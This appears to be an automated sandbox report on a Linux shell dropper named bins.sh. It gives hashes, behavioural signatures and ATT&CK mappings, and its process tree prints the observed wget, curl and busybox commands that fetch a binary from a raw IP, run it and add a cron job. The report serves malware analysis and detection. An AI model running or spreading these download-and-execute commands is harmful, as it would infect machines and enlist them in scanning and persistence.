8636ffc4c47b05053967830b8119844279ab787ccc8245eebaa8fcab55c73a6a

Analysis

max time kernel
149s
max time network
151s
platform
debian-9_armhf
resource
debian9-armhf-20240729-en
resource tags

arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11/12/2024, 18:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

6d4037130b20353b10064ed9679e3c81
SHA1

feac3dc2421c23aea64020407c83001b0e5a7080
SHA256

8636ffc4c47b05053967830b8119844279ab787ccc8245eebaa8fcab55c73a6a
SHA512

88c3c343c10f832fd187d0681c9677e79047ecd7a204bd2a37dcf5451457d60069ed47e272eb4e0451070dd849e5fbd634a660d177d14d55d0d12782ab3d740e
SSDEEP

192:P5J23fjFLdFNeHzfWffZBuPrM8VyUjUTUCUfBUtU4pFNeHz3ZBuPrjehUjUTUCUu:P5J23fjFA+fZBuPrM8VyUjUTUCUfBUty

Score

8^/10

antivm defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

Contacts a large (1849) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
686	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD	687	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD

Renames itself 1 IoCs

pid	Process
688	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD

Unexpected DNS network traffic destination 27 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76
Destination IP	37.2.163.76

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.3V25a3	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/631/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/822/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1058/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1210/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1262/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1270/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/921/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1107/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1229/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1060/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1256/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/766/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1133/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1253/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/109/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/850/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/985/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1049/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1157/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1180/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/106/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/930/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/965/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1038/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1221/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1244/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/165/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/586/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1095/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1231/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/950/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1057/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1091/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1126/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1154/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1206/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/749/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/972/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1127/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1191/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1263/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/669/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/969/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/7/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/22/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/748/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1144/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/5/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/309/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1051/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1105/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1179/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1259/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/792/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/919/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/975/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1065/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1081/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1094/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1268/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/26/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/737/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/778/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
File opened for reading	/proc/1114/cmdline	GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD	wget
File opened for modification	/tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD	curl
File opened for modification	/tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:639
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:641
- /usr/bin/wget
  wget http://216.126.231.164/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  2⤵
  - Writes file to tmp directory
  PID:643
- /usr/bin/curl
  curl -O http://216.126.231.164/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:670
- /bin/busybox
  /bin/busybox wget http://216.126.231.164/bins/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  2⤵
  - Writes file to tmp directory
  PID:679
- /bin/chmod
  chmod 777 GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  ./GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:687
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:689
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:690
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:693
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:694
- /bin/rm
  rm GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD
  2⤵
  PID:711
- /usr/bin/wget
  wget http://216.126.231.164/bins/Q35Esy6cEEsSgdQnvuctrU3mxBWjUnQPlV
  2⤵
  PID:715

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/GeO4W6JuphhBMfCgW9Lol5CsAiYioUBzTD

Filesize
177KB

MD5
786d75a158fe731feca3880f436082c0

SHA1
79ea2734e43d00cdeabed5586b2c1994d02aef3e

SHA256
5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

SHA512
7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Download Submit
/var/spool/cron/crontabs/tmp.3V25a3

Filesize
210B

MD5
efe79f3f0d2f7539d1ab6776c31df995

SHA1
ccc390f6fdc31513755a456afb14f38ece789615

SHA256
2ea16ea6709e5b809ee71ae82750090d3aef0d2a4ad0883bc6bcfd2186088dd3

SHA512
15d146c164bd3ef31bc4cd77c307871c27cab6b77dfb1ed6ee06303634e6341bb1a598bedab006e8d534b0941728cbf09c101114b3725ddc44d075869a23dca8

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads